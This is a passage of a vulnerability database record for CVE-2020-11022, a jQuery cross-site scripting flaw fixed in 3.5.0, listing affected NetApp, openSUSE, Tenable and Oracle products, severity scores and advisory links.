operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "0FEB3337-BFDE-462A-908B-176F92053CEC", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*", matchCriteriaId: "736AEAE9-782B-4F71-9893-DED53367E102", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", matchCriteriaId: "8497A4C9-8474-4A62-8331-3FE862ED4098", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", matchCriteriaId: "CDDF61B7-EC5C-467C-B710-B89F502CD04F", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, { criteria: "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", matchCriteriaId: "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:*", matchCriteriaId: "4ACF85D6-6B45-43DA-9C01-F0208186F014", versionEndExcluding: "6.0.9", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CA6F2E4C-C935-40CF-972E-8C3D8A912134", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:*", matchCriteriaId: "59830587-A6B0-4642-B566-6FD8792F7716", versionEndIncluding: "20.1", versionStartIncluding: "18.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::*:*:*:*:*:*:*:*", matchCriteriaId: "FAFED7F5-03FA-43B5-AD13-1130F0324448", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "021014B2-DC51-481C-BCFE-5857EFBDEDDA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "AD080793-FC45-4260-8E45-40E228F432FC", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "FCD1EC13-CC2F-4668-90D2-D8609066F2DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "4D614F76-0AA1-4EA8-A24A-38EFC90EF5DB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "C5E0646D-4866-41FB-AE2E-5307B6F4004A", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "B37FC113-4F40-4D29-8712-7AD250373008", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "712577A9-04D6-4579-A82B-72200E467399", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "987A0C35-4C7F-4FFB-B47B-37B69A32F879", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "8B3B6BE3-4C5A-402F-832C-86A0A6234C25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "34070F24-2E53-43EC-9117-E1434B2C4C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "B9B2C2F6-235F-4E78-A299-18C041C05C9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "6662C783-5B5C-4559-89F5-1A681AA46A3E", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "37C8EE84-A840-4132-B331-C7D450B1FBBF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "2A333755-4B6E-4A0F-AC48-4CEA70CD5801", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "501B9331-6BB7-44BF-A664-180CAFABF88C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "F2A3AE3C-8E24-4FB6-9954-9B50CBD59B21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:*", matchCriteriaId: "AED72F90-3B68-45AC-865C-110F7FD30D37", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "4F909C61-1A74-402C-B74F-BAF7297875B0", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "609D6EDF-D4D0-4370-9B8B-CA39D41946C0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:*", matchCriteriaId: "351F9DE9-2FCE-4BCA-A098-CDFB07E6E4B9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "D10745C6-2751-4FD0-BDFA-84C7AB8066BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "15512D27-7BEB-4DDD-9A1B-447FC7156E3D", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "90F0B2AB-453C-4585-8753-74D17BD20C79", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.", }, { lang: "es", value: "En las versiones de jQuery mayores o iguales a 1.2 y anteriores a la versión 3.5.0, se puede ejecutar HTML desde fuentes no seguras, incluso después de desinfectarlo, a uno de los métodos de manipulación DOM de jQuery (es decir .html (), .append () y otros). código no seguro Este problema está corregido en jQuery 3.5.0.", }, ], id: "CVE-2020-11022", lastModified: "2024-11-21T04:56:36.110", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 4.7, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-04-29T22:15:11.903", references: [ { source: "security-advisories@github.com", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { source: "security-advisories@github.com", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { source: "security-advisories@github.com", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { source: "security-advisories@github.com", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { source: "security-advisories@github.com", tags: [ "Mitigation", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { source: "security-advisories@github.com", tags: [ "Mitigation", "Vendor Advisory", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { source: "security-advisories@github.com", url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2020-002", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security-advisories@github.com", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-10", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-11", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-02", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mitigation", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ 